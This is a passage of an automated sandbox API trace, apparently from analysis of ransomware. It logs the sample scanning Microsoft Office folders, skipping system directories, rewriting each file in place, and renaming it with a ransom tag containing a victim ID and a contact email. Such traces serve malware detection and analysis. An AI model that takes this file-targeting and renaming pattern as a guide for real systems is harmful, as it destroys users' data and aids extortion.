[0112.437] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x9888767, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x9888767, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x9888767, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x404, dwReserved0=0x60002, dwReserved1=0x2097ea, cFileName="officemui.msi.16_PostCommon.Office.MUI.mcxml", cAlternateFileName="OFFICE~1.MCX")) returned 1 [0112.437] lstrcmpiW (lpString1="officemui.msi.16_PostCommon.Office.MUI.mcxml", lpString2=".") returned 1 [0112.437] lstrcmpiW (lpString1="officemui.msi.16_PostCommon.Office.MUI.mcxml", lpString2="..") returned 1 [0112.437] lstrcmpiW (lpString1="officemui.msi.16_PostCommon.Office.MUI.mcxml", lpString2="...") returned 1 [0112.437] lstrcmpiW (lpString1="officemui.msi.16_PostCommon.Office.MUI.mcxml", lpString2="windows") returned -1 [0112.437] lstrcmpiW (lpString1="officemui.msi.16_PostCommon.Office.MUI.mcxml", lpString2="recovery") returned -1 [0112.437] lstrcmpiW (lpString1="officemui.msi.16_PostCommon.Office.MUI.mcxml", lpString2="perflogs") returned -1 [0112.437] lstrcmpiW (lpString1="officemui.msi.16_PostCommon.Office.MUI.mcxml", lpString2="documents and settings") returned 1 [0112.437] lstrcmpiW (lpString1="officemui.msi.16_PostCommon.Office.MUI.mcxml", lpString2="$RECYCLE.BIN") returned 1 [0112.437] lstrcmpiW (lpString1="officemui.msi.16_PostCommon.Office.MUI.mcxml", lpString2="system volume information") returned -1 [0112.437] lstrcmpiW (lpString1="officemui.msi.16_PostCommon.Office.MUI.mcxml", lpString2="msocache") returned 1 [0112.437] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233230 [0112.437] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="officemui.msi.16_PostCommon.Office.MUI.mcxml", cchWideChar=44, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 44 [0112.437] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0112.437] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="officemui.msi.16_PostCommon.Office.MUI.mcxml", cchWideChar=44, lpMultiByteStr=0x22cdc8, cbMultiByte=44, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="officemui.msi.16_PostCommon.Office.MUI.mcxml", lpUsedDefaultChar=0x0) returned 44 [0112.437] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233230 | out: hHeap=0x1e0000) returned 1 [0112.437] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e88 [0112.437] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="officemui.msi.16_PostCommon.Office.MUI.mcxml", cchWideChar=44, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 44 [0112.437] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0112.437] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="officemui.msi.16_PostCommon.Office.MUI.mcxml", cchWideChar=44, lpMultiByteStr=0x22d0a0, cbMultiByte=44, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="officemui.msi.16_PostCommon.Office.MUI.mcxml", lpUsedDefaultChar=0x0) returned 44 [0112.437] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e88 | out: hHeap=0x1e0000) returned 1 [0112.437] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bda8 [0112.437] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0112.437] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0112.437] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0112.437] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bce0 [0112.437] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\officemui.msi.16_PostCommon.Office.MUI.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\officemui.msi.16_postcommon.office.mui.mcxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0112.438] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1028) returned 1 [0112.438] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.438] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x400) returned 0x230a00 [0112.438] ReadFile (in: hFile=0x238, lpBuffer=0x230a00, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesRead=0x345e89c*=0x400, lpOverlapped=0x0) returned 1 [0112.440] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.440] WriteFile (in: hFile=0x238, lpBuffer=0x230a00*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesWritten=0x345e898*=0x400, lpOverlapped=0x0) returned 1 [0112.440] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x230a00 | out: hHeap=0x1e0000) returned 1 [0112.440] CloseHandle (hObject=0x238) returned 1 [0112.440] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b448 [0112.440] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0112.440] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0112.440] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0112.440] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0112.440] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0112.440] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0112.440] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0112.440] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0112.440] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0112.440] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0112.440] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0112.440] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0112.440] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0112.441] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\officemui.msi.16_PostCommon.Office.MUI.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\officemui.msi.16_postcommon.office.mui.mcxml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\officemui.msi.16_PostCommon.Office.MUI.mcxml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\officemui.msi.16_postcommon.office.mui.mcxml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0112.441] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0112.441] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b448 | out: hHeap=0x1e0000) returned 1 [0112.441] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bce0 | out: hHeap=0x1e0000) returned 1 [0112.441] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0112.441] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0112.441] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x99473dc, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x99473dc, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x99dfc61, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3f82, dwReserved0=0x60002, dwReserved1=0x2097ea, cFileName="officemuiset.msi.16_officemuiset.mcxml", cAlternateFileName="OF42EC~1.MCX")) returned 1 [0112.441] lstrcmpiW (lpString1="officemuiset.msi.16_officemuiset.mcxml", lpString2=".") returned 1 [0112.441] lstrcmpiW (lpString1="officemuiset.msi.16_officemuiset.mcxml", lpString2="..") returned 1 [0112.442] lstrcmpiW (lpString1="officemuiset.msi.16_officemuiset.mcxml", lpString2="...") returned 1 [0112.442] lstrcmpiW (lpString1="officemuiset.msi.16_officemuiset.mcxml", lpString2="windows") returned -1 [0112.442] lstrcmpiW (lpString1="officemuiset.msi.16_officemuiset.mcxml", lpString2="recovery") returned -1 [0112.442] lstrcmpiW (lpString1="officemuiset.msi.16_officemuiset.mcxml", lpString2="perflogs") returned -1 [0112.442] lstrcmpiW (lpString1="officemuiset.msi.16_officemuiset.mcxml", lpString2="documents and settings") returned 1 [0112.442] lstrcmpiW (lpString1="officemuiset.msi.16_officemuiset.mcxml", lpString2="$RECYCLE.BIN") returned 1 [0112.442] lstrcmpiW (lpString1="officemuiset.msi.16_officemuiset.mcxml", lpString2="system volume information") returned -1 [0112.442] lstrcmpiW (lpString1="officemuiset.msi.16_officemuiset.mcxml", lpString2="msocache") returned 1 [0112.442] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0112.442] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="officemuiset.msi.16_officemuiset.mcxml", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0112.442] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0112.442] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="officemuiset.msi.16_officemuiset.mcxml", cchWideChar=38, lpMultiByteStr=0x22d260, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="officemuiset.msi.16_officemuiset.mcxml", lpUsedDefaultChar=0x0) returned 38 [0112.442] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0112.442] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c3d8 [0112.442] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="officemuiset.msi.16_officemuiset.mcxml", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0112.442] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0112.442] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="officemuiset.msi.16_officemuiset.mcxml", cchWideChar=38, lpMultiByteStr=0x22cdc8, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="officemuiset.msi.16_officemuiset.mcxml", lpUsedDefaultChar=0x0) returned 38 [0112.442] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c3d8 | out: hHeap=0x1e0000) returned 1 [0112.442] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b5d8 [0112.442] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bda8 | out: hHeap=0x1e0000) returned 1 [0112.442] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0112.442] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0112.442] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bce0 [0112.442] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\officemuiset.msi.16_officemuiset.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\officemuiset.msi.16_officemuiset.mcxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0112.450] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=16258) returned 1 [0112.450] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.450] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3f80) returned 0x24c1d0 [0112.450] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x3f80, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x3f80, lpOverlapped=0x0) returned 1 [0112.454] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.454] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x3f80, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x3f80, lpOverlapped=0x0) returned 1 [0112.454] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0112.455] CloseHandle (hObject=0x238) returned 1 [0112.455] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bda8 [0112.455] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0112.455] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0112.455] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0112.455] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0112.455] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0112.455] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0112.455] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0112.455] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0112.455] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0112.455] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b9c0 [0112.455] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f280 [0112.455] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b9c0 | out: hHeap=0x1e0000) returned 1 [0112.455] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0112.455] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\officemuiset.msi.16_officemuiset.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\officemuiset.msi.16_officemuiset.mcxml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\officemuiset.msi.16_officemuiset.mcxml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\officemuiset.msi.16_officemuiset.mcxml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0112.457] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f280 | out: hHeap=0x1e0000) returned 1 [0112.457] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bda8 | out: hHeap=0x1e0000) returned 1 [0112.457] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bce0 | out: hHeap=0x1e0000) returned 1 [0112.457] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0112.457] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0112.457] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x983c2c8, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x983c2c8, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x9862502, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1233a, dwReserved0=0x60002, dwReserved1=0x2097ea, cFileName="onenotemui.msi.16_onenotemui.mcxml", cAlternateFileName="ONENOT~1.MCX")) returned 1 [0112.457] lstrcmpiW (lpString1="onenotemui.msi.16_onenotemui.mcxml", lpString2=".") returned 1 [0112.457] lstrcmpiW (lpString1="onenotemui.msi.16_onenotemui.mcxml", lpString2="..") returned 1 [0112.457] lstrcmpiW (lpString1="onenotemui.msi.16_onenotemui.mcxml", lpString2="...") returned 1 [0112.457] lstrcmpiW (lpString1="onenotemui.msi.16_onenotemui.mcxml", lpString2="windows") returned -1 [0112.457] lstrcmpiW (lpString1="onenotemui.msi.16_onenotemui.mcxml", lpString2="recovery") returned -1 [0112.457] lstrcmpiW (lpString1="onenotemui.msi.16_onenotemui.mcxml", lpString2="perflogs") returned -1 [0112.458] lstrcmpiW (lpString1="onenotemui.msi.16_onenotemui.mcxml", lpString2="documents and settings") returned 1 [0112.458] lstrcmpiW (lpString1="onenotemui.msi.16_onenotemui.mcxml", lpString2="$RECYCLE.BIN") returned 1 [0112.458] lstrcmpiW (lpString1="onenotemui.msi.16_onenotemui.mcxml", lpString2="system volume information") returned -1 [0112.458] lstrcmpiW (lpString1="onenotemui.msi.16_onenotemui.mcxml", lpString2="msocache") returned 1 [0112.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22be00 [0112.458] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="onenotemui.msi.16_onenotemui.mcxml", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0112.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0112.458] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="onenotemui.msi.16_onenotemui.mcxml", cchWideChar=34, lpMultiByteStr=0x22d0a0, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="onenotemui.msi.16_onenotemui.mcxml", lpUsedDefaultChar=0x0) returned 34 [0112.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22be00 | out: hHeap=0x1e0000) returned 1 [0112.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0112.458] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="onenotemui.msi.16_onenotemui.mcxml", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0112.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0112.458] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="onenotemui.msi.16_onenotemui.mcxml", cchWideChar=34, lpMultiByteStr=0x22d260, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="onenotemui.msi.16_onenotemui.mcxml", lpUsedDefaultChar=0x0) returned 34 [0112.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0112.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0112.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b5d8 | out: hHeap=0x1e0000) returned 1 [0112.458] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0112.458] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0112.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0112.458] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\onenotemui.msi.16_onenotemui.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\onenotemui.msi.16_onenotemui.mcxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0112.459] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=74554) returned 1 [0112.459] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.459] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x12330) returned 0x24c1d0 [0112.459] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x12330, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x12330, lpOverlapped=0x0) returned 1 [0112.466] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.466] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x12330, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x12330, lpOverlapped=0x0) returned 1 [0112.466] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0112.467] CloseHandle (hObject=0x238) returned 1 [0112.467] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0112.467] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0112.467] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0112.467] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0112.467] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0112.467] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0112.467] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0112.467] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1e0 [0112.467] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1e0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0112.467] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1e0 | out: hHeap=0x1e0000) returned 1 [0112.467] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bda8 [0112.467] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ef08 [0112.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bda8 | out: hHeap=0x1e0000) returned 1 [0112.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0112.468] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\onenotemui.msi.16_onenotemui.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\onenotemui.msi.16_onenotemui.mcxml"), lpNewFileName="C:\\Program Files\\Microsoft 